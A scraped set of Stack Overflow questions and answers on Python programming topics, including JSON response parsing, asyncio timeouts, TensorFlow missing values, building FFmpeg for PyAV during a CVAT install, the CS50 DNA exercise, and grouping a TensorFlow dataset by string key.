Could anybody help me?
Thanks
A:
The b in the beginning means you have bytes, instead of a string, meaning you first have to convert your response content into a dictionary (think of a python term for a json) so that you can access the data in your response by their keys. Luckily that's easy to from a requests response with
json_data = response.json()
for sub_dict in json_data:
if sub_dict ["success"] is False:
raise ValueError("Check SF size fields...")
More about requests.response: https://requests.readthedocs.io/en/latest/api/#requests.Response
| check the boolean value of json Python | Hello I am pretty new working with AWS and SF I am trying to send information and I need to check if the list of json I am checking the information.
I have the next json list:
here...b'[{
"id": "xxxx",
"success": true,
"errors": []
},
{
"id": "yyyy",
"success": true,
"errors": []
}
]'
and in my lambda I do the next check:
response = requests.request("PATCH", url, headers=headers, data=body)
print('here...'+str(response.content))
if response.status_code == 200:
for iResult in response.content.b["success"]:
if iResult["success"] == false:
raise Exception('Error. Check SF size fields...')
I want to make sure that every 'success' in every json is equals to True. And if it is false to raise an Exception. So I made a loop to iterate over each json but the problem I have is that I do not know how to access the json correctly. What is confusing me is the " b' " in the json I print.
Could anybody help me?
Thanks
| [
"The b in the beginning means you have bytes, instead of a string, meaning you first have to convert your response content into a dictionary (think of a python term for a json) so that you can access the data in your response by their keys. Luckily that's easy to from a requests response with\njson_data = response.json()\nfor sub_dict in json_data:\n if sub_dict [\"success\"] is False:\n raise ValueError(\"Check SF size fields...\")\n\nMore about requests.response: https://requests.readthedocs.io/en/latest/api/#requests.Response\n"
] | [
0
] | [] | [] | [
"amazon_web_services",
"json",
"loops",
"python",
"salesforce"
] | stackoverflow_0074602226_amazon_web_services_json_loops_python_salesforce.txt |
Q:
Python Asyncio wait_for decorator
I am trying to write a decorator that calls asyncio.wait_for on the decorated function - the goal is to set a time limit on the decorated function. I expect the decorated function to stop running after time_limit but it does not. The decorator is being called fine but the code just sleeps for 30 seconds instead of being interrupted. Any ideas what I'm doing wrong?
def await_time_limit(time_limit):
def Inner(func):
async def wrapper(*args, **kwargs):
return await asyncio.wait_for(func(*args, **kwargs), time_limit)
return wrapper
return Inner
@await_time_limit(5)
async def whatever
time.sleep(30) # this runs to the full 30 seconds and not stopped after 5
end
A:
As we can see in this example here, the problem arises from using time.sleep not asyncio.sleep, since time.sleep will block the thread. You need to be careful not to have any blocking code
import asyncio
import time
def await_time_limit(time_limit):
def Inner(func):
async def wrapper(*args, **kwargs):
return await asyncio.wait_for(func(*args, **kwargs), time_limit)
return wrapper
return Inner
@await_time_limit(5)
async def asleep():
await asyncio.sleep(30) # this runs for only 5 seconds
@await_time_limit(5)
async def ssleep():
time.sleep(30) # this runs to the full 30 seconds and not stopped after 5
t1 = time.time()
await asleep()
t2 = time.time()
print(t2-t1) # 5.018370866775513
t1 = time.time()
await ssleep()
t2 = time.time()
print(t2-t1) # 30.00193428993225
| Python Asyncio wait_for decorator | I am trying to write a decorator that calls asyncio.wait_for on the decorated function - the goal is to set a time limit on the decorated function. I expect the decorated function to stop running after time_limit but it does not. The decorator is being called fine but the code just sleeps for 30 seconds instead of being interrupted. Any ideas what I'm doing wrong?
def await_time_limit(time_limit):
def Inner(func):
async def wrapper(*args, **kwargs):
return await asyncio.wait_for(func(*args, **kwargs), time_limit)
return wrapper
return Inner
@await_time_limit(5)
async def whatever
time.sleep(30) # this runs to the full 30 seconds and not stopped after 5
end
| [
"As we can see in this example here, the problem arises from using time.sleep not asyncio.sleep, since time.sleep will block the thread. You need to be careful not to have any blocking code\nimport asyncio\nimport time\n\n\ndef await_time_limit(time_limit):\n def Inner(func):\n async def wrapper(*args, **kwargs):\n return await asyncio.wait_for(func(*args, **kwargs), time_limit)\n return wrapper\n return Inner\n\n\n@await_time_limit(5)\nasync def asleep():\n await asyncio.sleep(30) # this runs for only 5 seconds\n\n\n@await_time_limit(5)\nasync def ssleep():\n time.sleep(30) # this runs to the full 30 seconds and not stopped after 5\n\n\nt1 = time.time()\nawait asleep()\nt2 = time.time()\nprint(t2-t1) # 5.018370866775513\n\n\nt1 = time.time()\nawait ssleep()\nt2 = time.time()\nprint(t2-t1) # 30.00193428993225\n\n"
] | [
1
] | [] | [] | [
"python",
"python_asyncio",
"python_decorators"
] | stackoverflow_0074602321_python_python_asyncio_python_decorators.txt |
Q:
Can Tensorflow Machine Learning Model train data that has None values?
I'm wondering if Tensorflow Machine Learning Model can train data that has None valuess?
I have a Data table with multiple data (in each row) and in some of these rows, there are columns with None/Null value:
Column A
Column B
Column C
50
None
2
2
100
None
Or should I not have None values in my dataset and instead set all of them to 0? But then I think 0 is not a really good representation of the value because the reason why there are None values is simply because I couldn't get data for them. But 0 kind of means like a value...
A:
TensorFlow is no different to any other ML solution you could find - strickly speaking, no, it cannot learn from Nones and its your responsibility to encode them somehow to a numerical value. It could be any value you find reasonable - I would recommend you to read through https://scikit-learn.org/stable/modules/impute.html, for example.
A:
You are trying to avoid Imputation. Most models don't support this, but some implementations of "Naive Bayes" and "k-Nearest Neighbor" can do it apparently. Maybe this article can help you.
| Can Tensorflow Machine Learning Model train data that has None values? | I'm wondering if Tensorflow Machine Learning Model can train data that has None valuess?
I have a Data table with multiple data (in each row) and in some of these rows, there are columns with None/Null value:
Column A
Column B
Column C
50
None
2
2
100
None
Or should I not have None values in my dataset and instead set all of them to 0? But then I think 0 is not a really good representation of the value because the reason why there are None values is simply because I couldn't get data for them. But 0 kind of means like a value...
| [
"TensorFlow is no different to any other ML solution you could find - strickly speaking, no, it cannot learn from Nones and its your responsibility to encode them somehow to a numerical value. It could be any value you find reasonable - I would recommend you to read through https://scikit-learn.org/stable/modules/impute.html, for example.\n",
"You are trying to avoid Imputation. Most models don't support this, but some implementations of \"Naive Bayes\" and \"k-Nearest Neighbor\" can do it apparently. Maybe this article can help you.\n"
] | [
0,
0
] | [] | [] | [
"python",
"tensorflow"
] | stackoverflow_0074602128_python_tensorflow.txt |
Q:
CVAT error during installation of development version
I'm trying to install development version of CVAT according to official instruction but struggling at the step of requirements.txt applying:
pip install -r cvat/requirements/development.txt
... with following error:
Skipping wheel build for av, due to binaries being disabled for it.
Skipping wheel build for datumaro, due to binaries being disabled for it.
Installing collected packages: wrapt, tf-estimator-nightly, termcolor, tensorboard-plugin-wit, Shapely, rules, rope, rjsmin, rcssmin, pytz, pyasn1, patool, mistune, mccabe, libclang, keras, itypes, flatbuffers, entrypoint2, EasyProcess, dj-pagination, diskcache, av, addict, Werkzeug, urllib3, uritemplate, typing-extensions, tqdm, tornado, toml, threadpoolctl, tensorflow-io-gcs-filesystem, tensorboard-data-server, sqlparse, smmap, six, ruamel.yaml.clib, rsa, redis, PyYAML, pyunpack, pyrsistent, pyparsing, pylogbeat, pyjwt, Pygments, pycparser, pyasn1-modules, protobuf, Pillow, oauthlib, numpy, networkx, natsort, MarkupSafe, Markdown, lxml, lazy-object-proxy, kiwisolver, joblib, jmespath, isort, inflection, idna, google-crc32c, gast, fonttools, dnspython, django-extensions, deprecated, defusedxml, cycler, click, charset-normalizer, certifi, cachetools, attrs, asgiref, absl-py, tensorboardX, snakeviz, scipy, ruamel.yaml, rq, requests, python3-openid, python-ldap, python-dateutil, pdf2image, packaging, orderedmultidict, opt-einsum, opencv-python-headless, opencv-python, keras-preprocessing, jsonschema, jinja2, isodate, h5py, grpcio, googleapis-common-protos, google-resumable-media, google-pasta, google-auth, gitdb, Django, cffi, astunparse, astroid, scikit-learn, requests-oauthlib, pylint, pandas, matplotlib, limits, google-api-core, GitPython, furl, djangorestframework, django-sendfile2, django-rq, django-filter, django-cors-headers, django-auth-ldap, django-appconf, cryptography, croniter, coreschema, botocore, azure-core, s3transfer, rq-scheduler, python-logstash-async, pylint-plugin-utils, pycocotools, open3d, msrest, google-cloud-core, google-auth-oauthlib, drf-spectacular, django-rest-auth, django-compressor, coreapi, tensorboard, pylint-django, google-cloud-storage, django-allauth, datumaro, boto3, azure-storage-blob, tensorflow
Running setup.py install for av ... error
error: subprocess-exited-with-error
× Running setup.py install for av did not run successfully.
│ exit code: 1
╰─> [50 lines of output]
running install
/Users/dd/cvat/.env/lib/python3.9/site-packages/setuptools/command/install.py:34: SetuptoolsDeprecationWarning: setup.py install is deprecated. Use build and pip and other standards-based tools.
warnings.warn(
running build
running build_py
creating build
creating build/lib.macosx-12.4-x86_64-cpython-39
creating build/lib.macosx-12.4-x86_64-cpython-39/av
copying av/deprecation.py -> build/lib.macosx-12.4-x86_64-cpython-39/av
copying av/datasets.py -> build/lib.macosx-12.4-x86_64-cpython-39/av
copying av/__init__.py -> build/lib.macosx-12.4-x86_64-cpython-39/av
copying av/__main__.py -> build/lib.macosx-12.4-x86_64-cpython-39/av
creating build/lib.macosx-12.4-x86_64-cpython-39/av/video
copying av/video/__init__.py -> build/lib.macosx-12.4-x86_64-cpython-39/av/video
creating build/lib.macosx-12.4-x86_64-cpython-39/av/codec
copying av/codec/__init__.py -> build/lib.macosx-12.4-x86_64-cpython-39/av/codec
creating build/lib.macosx-12.4-x86_64-cpython-39/av/container
copying av/container/__init__.py -> build/lib.macosx-12.4-x86_64-cpython-39/av/container
creating build/lib.macosx-12.4-x86_64-cpython-39/av/audio
copying av/audio/__init__.py -> build/lib.macosx-12.4-x86_64-cpython-39/av/audio
creating build/lib.macosx-12.4-x86_64-cpython-39/av/subtitles
copying av/subtitles/__init__.py -> build/lib.macosx-12.4-x86_64-cpython-39/av/subtitles
creating build/lib.macosx-12.4-x86_64-cpython-39/av/filter
copying av/filter/__init__.py -> build/lib.macosx-12.4-x86_64-cpython-39/av/filter
creating build/lib.macosx-12.4-x86_64-cpython-39/av/sidedata
copying av/sidedata/__init__.py -> build/lib.macosx-12.4-x86_64-cpython-39/av/sidedata
creating build/lib.macosx-12.4-x86_64-cpython-39/av/data
copying av/data/__init__.py -> build/lib.macosx-12.4-x86_64-cpython-39/av/data
running build_ext
running config
PyAV: 8.0.2 (unknown commit)
Python: 3.9.10 (main, Jun 28 2022, 17:49:16) \n[Clang 13.1.6 (clang-1316.0.21.2.5)]
platform: macOS-12.4-x86_64-i386-64bit
extension_extra:
include_dirs: [b'include']
libraries: []
library_dirs: []
define_macros: []
runtime_library_dirs: []
config_macros:
PYAV_COMMIT_STR="unknown-commit"
PYAV_VERSION=8.0.2
PYAV_VERSION_STR="8.0.2"
Could not find libavformat with pkg-config.
Could not find libavcodec with pkg-config.
Could not find libavdevice with pkg-config.
Could not find libavutil with pkg-config.
Could not find libavfilter with pkg-config.
Could not find libswscale with pkg-config.
Could not find libswresample with pkg-config.
[end of output]
note: This error originates from a subprocess, and is likely not a problem with pip.
error: legacy-install-failure
× Encountered error while trying to install package.
╰─> av
I have already tried suggested fixes, but no luck:
https://github.com/openvinotoolkit/cvat/issues/4406
Environment:
MacBook Pro (Intel x64)
macOS Monterey (Version 12.4)
(pyenv) Python 3.9.10
What other options could be applied to fix it?
A:
Facing this same problem just last week. I would say the problem is that you are trying to install PyAv without the proper dynamic libraries from FFMPEG. PyAv is just a bunch of Python bindings to connect with binary dynamic libraries in the system. I'm also assuming you are probably on Ubuntu 18.04. The newest FFMPEG version on the standard repository is no good, it's 3.x.
You need either have to compile some FFMPEG version equal or above 4.0. To do that, you need to compile FFMPEG from the source, compile and install it with make and make install. Or you can add a repository with the binaries you want. I compiled it myself, and it generated all the libaries I needed, so that's what I describe here.
First run ffmpeg on the terminal to make sure you have a FFMPEG version below 4.0. And if that's the case, run the following commands. They will download the source code, extract it, compile it and install the files. After that, the Python bindings of PyAv should find the correct libraries and the installation will be able to proceed.
Make sure you have the dependences:
sudo apt install yasm libvpx. libx264. cmake libavdevice-dev libavfilter-dev libopus-dev libvpx-dev pkg-config libsrtp2-dev libpython3-dev python3-numpy
Then download the sources:
curl https://launchpad.net/ubuntu/+archive/primary/+sourcefiles/ffmpeg/7:4.2.4-1ubuntu0.1/ffmpeg_4.2.4.orig.tar.xz --output ffmpeg_4.2.4
Extract the file:
tar -xf ffmpeg_4.2.4.orig.tar.xz
Enter the directory:
cd ffmpeg-4.2.4/
And compile and install the files:
./configure --disable-static --enable-shared --disable-doc
make
sudo make install
sudo ldconfig
It should now compile and install the dynamic libraries for FFMPEG 4.2.4. Once it finishes, open a NEW terminal, and type ffmpeg to verify that a new 4.x version is now avaliable. Then try to install CVAT again, it should work now.
| CVAT error during installation of development version | I'm trying to install development version of CVAT according to official instruction but struggling at the step of requirements.txt applying:
pip install -r cvat/requirements/development.txt
... with following error:
Skipping wheel build for av, due to binaries being disabled for it.
Skipping wheel build for datumaro, due to binaries being disabled for it.
Installing collected packages: wrapt, tf-estimator-nightly, termcolor, tensorboard-plugin-wit, Shapely, rules, rope, rjsmin, rcssmin, pytz, pyasn1, patool, mistune, mccabe, libclang, keras, itypes, flatbuffers, entrypoint2, EasyProcess, dj-pagination, diskcache, av, addict, Werkzeug, urllib3, uritemplate, typing-extensions, tqdm, tornado, toml, threadpoolctl, tensorflow-io-gcs-filesystem, tensorboard-data-server, sqlparse, smmap, six, ruamel.yaml.clib, rsa, redis, PyYAML, pyunpack, pyrsistent, pyparsing, pylogbeat, pyjwt, Pygments, pycparser, pyasn1-modules, protobuf, Pillow, oauthlib, numpy, networkx, natsort, MarkupSafe, Markdown, lxml, lazy-object-proxy, kiwisolver, joblib, jmespath, isort, inflection, idna, google-crc32c, gast, fonttools, dnspython, django-extensions, deprecated, defusedxml, cycler, click, charset-normalizer, certifi, cachetools, attrs, asgiref, absl-py, tensorboardX, snakeviz, scipy, ruamel.yaml, rq, requests, python3-openid, python-ldap, python-dateutil, pdf2image, packaging, orderedmultidict, opt-einsum, opencv-python-headless, opencv-python, keras-preprocessing, jsonschema, jinja2, isodate, h5py, grpcio, googleapis-common-protos, google-resumable-media, google-pasta, google-auth, gitdb, Django, cffi, astunparse, astroid, scikit-learn, requests-oauthlib, pylint, pandas, matplotlib, limits, google-api-core, GitPython, furl, djangorestframework, django-sendfile2, django-rq, django-filter, django-cors-headers, django-auth-ldap, django-appconf, cryptography, croniter, coreschema, botocore, azure-core, s3transfer, rq-scheduler, python-logstash-async, pylint-plugin-utils, pycocotools, open3d, msrest, google-cloud-core, google-auth-oauthlib, drf-spectacular, django-rest-auth, django-compressor, coreapi, tensorboard, pylint-django, google-cloud-storage, django-allauth, datumaro, boto3, azure-storage-blob, tensorflow
Running setup.py install for av ... error
error: subprocess-exited-with-error
× Running setup.py install for av did not run successfully.
│ exit code: 1
╰─> [50 lines of output]
running install
/Users/dd/cvat/.env/lib/python3.9/site-packages/setuptools/command/install.py:34: SetuptoolsDeprecationWarning: setup.py install is deprecated. Use build and pip and other standards-based tools.
warnings.warn(
running build
running build_py
creating build
creating build/lib.macosx-12.4-x86_64-cpython-39
creating build/lib.macosx-12.4-x86_64-cpython-39/av
copying av/deprecation.py -> build/lib.macosx-12.4-x86_64-cpython-39/av
copying av/datasets.py -> build/lib.macosx-12.4-x86_64-cpython-39/av
copying av/__init__.py -> build/lib.macosx-12.4-x86_64-cpython-39/av
copying av/__main__.py -> build/lib.macosx-12.4-x86_64-cpython-39/av
creating build/lib.macosx-12.4-x86_64-cpython-39/av/video
copying av/video/__init__.py -> build/lib.macosx-12.4-x86_64-cpython-39/av/video
creating build/lib.macosx-12.4-x86_64-cpython-39/av/codec
copying av/codec/__init__.py -> build/lib.macosx-12.4-x86_64-cpython-39/av/codec
creating build/lib.macosx-12.4-x86_64-cpython-39/av/container
copying av/container/__init__.py -> build/lib.macosx-12.4-x86_64-cpython-39/av/container
creating build/lib.macosx-12.4-x86_64-cpython-39/av/audio
copying av/audio/__init__.py -> build/lib.macosx-12.4-x86_64-cpython-39/av/audio
creating build/lib.macosx-12.4-x86_64-cpython-39/av/subtitles
copying av/subtitles/__init__.py -> build/lib.macosx-12.4-x86_64-cpython-39/av/subtitles
creating build/lib.macosx-12.4-x86_64-cpython-39/av/filter
copying av/filter/__init__.py -> build/lib.macosx-12.4-x86_64-cpython-39/av/filter
creating build/lib.macosx-12.4-x86_64-cpython-39/av/sidedata
copying av/sidedata/__init__.py -> build/lib.macosx-12.4-x86_64-cpython-39/av/sidedata
creating build/lib.macosx-12.4-x86_64-cpython-39/av/data
copying av/data/__init__.py -> build/lib.macosx-12.4-x86_64-cpython-39/av/data
running build_ext
running config
PyAV: 8.0.2 (unknown commit)
Python: 3.9.10 (main, Jun 28 2022, 17:49:16) \n[Clang 13.1.6 (clang-1316.0.21.2.5)]
platform: macOS-12.4-x86_64-i386-64bit
extension_extra:
include_dirs: [b'include']
libraries: []
library_dirs: []
define_macros: []
runtime_library_dirs: []
config_macros:
PYAV_COMMIT_STR="unknown-commit"
PYAV_VERSION=8.0.2
PYAV_VERSION_STR="8.0.2"
Could not find libavformat with pkg-config.
Could not find libavcodec with pkg-config.
Could not find libavdevice with pkg-config.
Could not find libavutil with pkg-config.
Could not find libavfilter with pkg-config.
Could not find libswscale with pkg-config.
Could not find libswresample with pkg-config.
[end of output]
note: This error originates from a subprocess, and is likely not a problem with pip.
error: legacy-install-failure
× Encountered error while trying to install package.
╰─> av
I have already tried suggested fixes, but no luck:
https://github.com/openvinotoolkit/cvat/issues/4406
Environment:
MacBook Pro (Intel x64)
macOS Monterey (Version 12.4)
(pyenv) Python 3.9.10
What other options could be applied to fix it?
| [
"Facing this same problem just last week. I would say the problem is that you are trying to install PyAv without the proper dynamic libraries from FFMPEG. PyAv is just a bunch of Python bindings to connect with binary dynamic libraries in the system. I'm also assuming you are probably on Ubuntu 18.04. The newest FFMPEG version on the standard repository is no good, it's 3.x.\nYou need either have to compile some FFMPEG version equal or above 4.0. To do that, you need to compile FFMPEG from the source, compile and install it with make and make install. Or you can add a repository with the binaries you want. I compiled it myself, and it generated all the libaries I needed, so that's what I describe here.\nFirst run ffmpeg on the terminal to make sure you have a FFMPEG version below 4.0. And if that's the case, run the following commands. They will download the source code, extract it, compile it and install the files. After that, the Python bindings of PyAv should find the correct libraries and the installation will be able to proceed.\nMake sure you have the dependences:\nsudo apt install yasm libvpx. libx264. cmake libavdevice-dev libavfilter-dev libopus-dev libvpx-dev pkg-config libsrtp2-dev libpython3-dev python3-numpy\nThen download the sources:\ncurl https://launchpad.net/ubuntu/+archive/primary/+sourcefiles/ffmpeg/7:4.2.4-1ubuntu0.1/ffmpeg_4.2.4.orig.tar.xz --output ffmpeg_4.2.4\nExtract the file:\ntar -xf ffmpeg_4.2.4.orig.tar.xz\nEnter the directory:\ncd ffmpeg-4.2.4/\nAnd compile and install the files:\n./configure --disable-static --enable-shared --disable-doc\nmake\nsudo make install\nsudo ldconfig\nIt should now compile and install the dynamic libraries for FFMPEG 4.2.4. Once it finishes, open a NEW terminal, and type ffmpeg to verify that a new 4.x version is now avaliable. Then try to install CVAT again, it should work now.\n"
] | [
0
] | [] | [] | [
"cvat",
"ffmpeg",
"libav",
"pkg_config",
"python"
] | stackoverflow_0072789956_cvat_ffmpeg_libav_pkg_config_python.txt |
Q:
How do I print the person name in DNA PSET5 CS50x
I don't know how to print the person's name that matches the numbers (as strings) returned from "list4"
(sorry for bad english) So I use print(list4) and I get the right values, but I don't know how to get
the name from the person. Example : list4 = ['4', '1', '5'], so how I get 'Bob'? I would appreciate any help!
import csv
import sys
import itertools
import re
import collections
import json
import functools
def main():
# TODO: Check for command-line usage
# not done yet
filecsv = sys.argv[1]
filetext = sys.argv[2]
names = []
# TODO: Read DNA sequence file into a variable
with open(filecsv, "r") as csvfile:
reader = csv.reader(csvfile)
dict_list = list(reader)
names.append(dict_list)
# Open sequences file and convert to list
with open(filetext, "r") as file:
sequence = file.read()
# TODO: Find longest match of each STR in DNA sequence
find_STR = []
for i in range(1, len(dict_list[0])):
find_STR.append(longest_match(sequence, dict_list[0][i]))
#TODO: Check database for matching profiles
#convert dict_list to a string
listToStr = ' '.join([str(elem) for elem in dict_list])
#convert find_STR to a string
A = [str(x) for x in find_STR]
# compare both strings
list3 = set(A)&set(listToStr)
list4 = sorted(list3, key = lambda k : A.index(k))
if(list4):
print(name) # how???`
return
def longest_match(sequence, subsequence):
"""Returns length of longest run of subsequence in sequence."""
# Initialize variables
longest_run = 0
subsequence_length = len(subsequence)
sequence_length = len(sequence)
# Check each character in sequence for most consecutive runs of subsequence
for i in range(sequence_length):
# Initialize count of consecutive runs
count = 0
# Check for a subsequence match in a "substring" (a subset of characters) within sequence
# If a match, move substring to next potential match in sequence
# Continue moving substring and checking for matches until out of consecutive matches
while True:
# Adjust substring start and end
start = i + count * subsequence_length
end = start + subsequence_length
# If there is a match in the substring
if sequence[start:end] == subsequence:
count += 1
# If there is no match in the substring
else:
break
# Update most consecutive matches found
longest_run = max(longest_run, count)
return longest_run
main()
A:
Start by inspecting the values in your variables. For example, look at dict_list and names for the small.csv file and you will find:
dict_list:
[['name', 'AGATC', 'AATG', 'TATC'], ['Alice', '2', '8', '3'], ['Bob', '4', '1', '5'], ['Charlie', '3', '2', '5']]
names:
[[['name', 'AGATC', 'AATG', 'TATC'], ['Alice', '2', '8', '3'], ['Bob', '4', '1', '5'], ['Charlie', '3', '2', '5']]]
First observation: dict_list is a list of lists (not dictionaries). This happens when you set dict_list = list(reader). Use csv.DictReader() if you want to create a list of dictionaries. You don't have to create a list of dictionaries, but you will find it makes it much easier to work with the data. Also, there is nothing gained by appending dict_list to another list (names).
Next, look at find_STR. For sequence 1 is: [4, 1, 5]. However, you didn't save the longest match value with the STR sequence name. As a result, you have to reference the first list item in names (or dict_list).
Once you have the longest match values (in find_STR), you need to compare them to the names and sequence counts in dict_list, and find the 1 that matches. (For this sequence, it will be ['Bob', '4', '1', '5'].) Once you find the match, the first item in the list is the name you want: Bob.
None of the code to create A, list3 or list4 do this. They simply return '4', '1', '5' as different objects: A is a list of strings, list3 is an unsorted set of strings, and list4 is a sorted list of strings that matches A. There isn't a name there to print.
Good luck.
| How do I print the person name in DNA PSET5 CS50x | I don't know how to print the person's name that matches the numbers (as strings) returned from "list4"
(sorry for bad english) So I use print(list4) and I get the right values, but I don't know how to get
the name from the person. Example : list4 = ['4', '1', '5'], so how I get 'Bob'? I would appreciate any help!
import csv
import sys
import itertools
import re
import collections
import json
import functools
def main():
# TODO: Check for command-line usage
# not done yet
filecsv = sys.argv[1]
filetext = sys.argv[2]
names = []
# TODO: Read DNA sequence file into a variable
with open(filecsv, "r") as csvfile:
reader = csv.reader(csvfile)
dict_list = list(reader)
names.append(dict_list)
# Open sequences file and convert to list
with open(filetext, "r") as file:
sequence = file.read()
# TODO: Find longest match of each STR in DNA sequence
find_STR = []
for i in range(1, len(dict_list[0])):
find_STR.append(longest_match(sequence, dict_list[0][i]))
#TODO: Check database for matching profiles
#convert dict_list to a string
listToStr = ' '.join([str(elem) for elem in dict_list])
#convert find_STR to a string
A = [str(x) for x in find_STR]
# compare both strings
list3 = set(A)&set(listToStr)
list4 = sorted(list3, key = lambda k : A.index(k))
if(list4):
print(name) # how???`
return
def longest_match(sequence, subsequence):
"""Returns length of longest run of subsequence in sequence."""
# Initialize variables
longest_run = 0
subsequence_length = len(subsequence)
sequence_length = len(sequence)
# Check each character in sequence for most consecutive runs of subsequence
for i in range(sequence_length):
# Initialize count of consecutive runs
count = 0
# Check for a subsequence match in a "substring" (a subset of characters) within sequence
# If a match, move substring to next potential match in sequence
# Continue moving substring and checking for matches until out of consecutive matches
while True:
# Adjust substring start and end
start = i + count * subsequence_length
end = start + subsequence_length
# If there is a match in the substring
if sequence[start:end] == subsequence:
count += 1
# If there is no match in the substring
else:
break
# Update most consecutive matches found
longest_run = max(longest_run, count)
return longest_run
main()
| [
"Start by inspecting the values in your variables. For example, look at dict_list and names for the small.csv file and you will find:\ndict_list:\n[['name', 'AGATC', 'AATG', 'TATC'], ['Alice', '2', '8', '3'], ['Bob', '4', '1', '5'], ['Charlie', '3', '2', '5']]\nnames:\n[[['name', 'AGATC', 'AATG', 'TATC'], ['Alice', '2', '8', '3'], ['Bob', '4', '1', '5'], ['Charlie', '3', '2', '5']]]\n\nFirst observation: dict_list is a list of lists (not dictionaries). This happens when you set dict_list = list(reader). Use csv.DictReader() if you want to create a list of dictionaries. You don't have to create a list of dictionaries, but you will find it makes it much easier to work with the data. Also, there is nothing gained by appending dict_list to another list (names).\nNext, look at find_STR. For sequence 1 is: [4, 1, 5]. However, you didn't save the longest match value with the STR sequence name. As a result, you have to reference the first list item in names (or dict_list).\nOnce you have the longest match values (in find_STR), you need to compare them to the names and sequence counts in dict_list, and find the 1 that matches. (For this sequence, it will be ['Bob', '4', '1', '5'].) Once you find the match, the first item in the list is the name you want: Bob.\nNone of the code to create A, list3 or list4 do this. They simply return '4', '1', '5' as different objects: A is a list of strings, list3 is an unsorted set of strings, and list4 is a sorted list of strings that matches A. There isn't a name there to print.\nGood luck.\n"
] | [
0
] | [] | [] | [
"cs50",
"python",
"python_3.x"
] | stackoverflow_0074586919_cs50_python_python_3.x.txt |
Q:
Tensorflow dataset group by string key
I have a tensorflow dataset that I would like to group by key. However, my keys are strings and not integers to I can't do that:
person_tensor = tf.constant(["person1", "person2", "person1", "person3", "person3"])
value_tensor = tf.constant([1,2,3,4,5])
ds = tf.data.Dataset.from_tensor_slices((person_tensor, value_tensor)).map(lambda person, value: {'person': person, 'value': value})
# >> list(ds.as_numpy_iterator())
# [{'person': b'person1', 'value': 1},
# {'person': b'person2', 'value': 2},
# {'person': b'person1', 'value': 3},
# {'person': b'person3', 'value': 4},
# {'person': b'person3', 'value': 5}]
window_size = 10 # not very important, I don't care getting multiple groups for one key as long as there is only one key per group
ds.group_by_window(
key_func=lambda row: row['person'],
window_size=window_size,
reduce_func=lambda key, rows: rows.batch(window_size)
)
# ValueError: Tensor conversion requested dtype int64 for Tensor with dtype string: <tf.Tensor 'args_0:0' shape=() dtype=string>
This method complains about string not being able to be converted to int64. Indeed, the key_func function is supposed to return an int64 and not a string as I did.
Is there another method to group a dataset by key?
A:
You could try utilizing tf.lookup.StaticHashTable like this:
import tensorflow as tf
person_tensor = tf.constant(["person1", "person2", "person1", "person3", "person3"])
value_tensor = tf.constant([1,2,3,4,5])
k_tensor = tf.unique(person_tensor)[0]
v_tensor = tf.cast(tf.range(tf.shape(k_tensor)[0]), dtype=tf.int64)
table = tf.lookup.StaticHashTable(
tf.lookup.KeyValueTensorInitializer(k_tensor, v_tensor),
default_value=-1)
reverse_table = tf.lookup.StaticHashTable(
tf.lookup.KeyValueTensorInitializer(v_tensor, k_tensor),
default_value="")
ds = tf.data.Dataset.from_tensor_slices((person_tensor, value_tensor)).map(lambda person, value: {'person': table.lookup(person), 'value': value})
window_size = 10 # not very important, I don't care getting multiple groups for one key as long as there is only one key per group
ds = ds.group_by_window(
key_func=lambda row: row['person'],
window_size=window_size,
reduce_func=lambda key, rows: rows.batch(window_size)
)
ds = ds.map(lambda d: {'person': tf.unique(reverse_table.lookup(d['person']))[0], 'value': d['value']})
list(ds.as_numpy_iterator())
[{'person': array([b'person1'], dtype=object),
'value': array([1, 3], dtype=int32)},
{'person': array([b'person2'], dtype=object),
'value': array([2], dtype=int32)},
{'person': array([b'person3'], dtype=object),
'value': array([4, 5], dtype=int32)}]
Or if you really have some unique number in your strings, you could also try using tf.strings.bytes_split and tf.strings.to_number:
person_tensor = tf.constant(["person1", "person2", "person1", "person3", "person3"])
value_tensor = tf.constant([1,2,3,4,5])
ds = tf.data.Dataset.from_tensor_slices((person_tensor, value_tensor)).map(lambda person, value: {'person': person, 'value': value})
window_size = 10 # not very important, I don't care getting multiple groups for one key as long as there is only one key per group
ds = ds.group_by_window(
key_func=lambda row: tf.strings.to_number(tf.strings.bytes_split(row['person'])[-1], tf.int64),
window_size=window_size,
reduce_func=lambda key, rows: rows.batch(window_size)
)
ds = ds.map(lambda d: {'person': tf.unique(d['person'])[0], 'value': d['value']})
list(ds.as_numpy_iterator())
[{'person': array([b'person1'], dtype=object),
'value': array([1, 3], dtype=int32)},
{'person': array([b'person2'], dtype=object),
'value': array([2], dtype=int32)},
{'person': array([b'person3'], dtype=object),
'value': array([4, 5], dtype=int32)}]
Or you could try using tf.strings.to_hash_bucket_fast:
person_tensor = tf.constant(["person1", "person2", "person1", "person3", "person3"])
value_tensor = tf.constant([1,2,3,4,5])
ds = tf.data.Dataset.from_tensor_slices((person_tensor, value_tensor)).map(lambda person, value: {'person': person, 'value': value})
window_size = 10 # not very important, I don't care getting multiple groups for one key as long as there is only one key per group
ds = ds.group_by_window(
key_func=lambda row: tf.strings.to_hash_bucket_fast(row['person'], 5),
window_size=window_size,
reduce_func=lambda key, rows: rows.batch(window_size)
)
ds = ds.map(lambda d: {'person': tf.unique(d['person'])[0], 'value': d['value']})
list(ds.as_numpy_iterator())
[{'person': array([b'person3'], dtype=object),
'value': array([4, 5], dtype=int32)},
{'person': array([b'person1'], dtype=object),
'value': array([1, 3], dtype=int32)},
{'person': array([b'person2'], dtype=object),
'value': array([2], dtype=int32)}]
| Tensorflow dataset group by string key | I have a tensorflow dataset that I would like to group by key. However, my keys are strings and not integers to I can't do that:
person_tensor = tf.constant(["person1", "person2", "person1", "person3", "person3"])
value_tensor = tf.constant([1,2,3,4,5])
ds = tf.data.Dataset.from_tensor_slices((person_tensor, value_tensor)).map(lambda person, value: {'person': person, 'value': value})
# >> list(ds.as_numpy_iterator())
# [{'person': b'person1', 'value': 1},
# {'person': b'person2', 'value': 2},
# {'person': b'person1', 'value': 3},
# {'person': b'person3', 'value': 4},
# {'person': b'person3', 'value': 5}]
window_size = 10 # not very important, I don't care getting multiple groups for one key as long as there is only one key per group
ds.group_by_window(
key_func=lambda row: row['person'],
window_size=window_size,
reduce_func=lambda key, rows: rows.batch(window_size)
)
# ValueError: Tensor conversion requested dtype int64 for Tensor with dtype string: <tf.Tensor 'args_0:0' shape=() dtype=string>
This method complains about string not being able to be converted to int64. Indeed, the key_func function is supposed to return an int64 and not a string as I did.
Is there another method to group a dataset by key?
| [
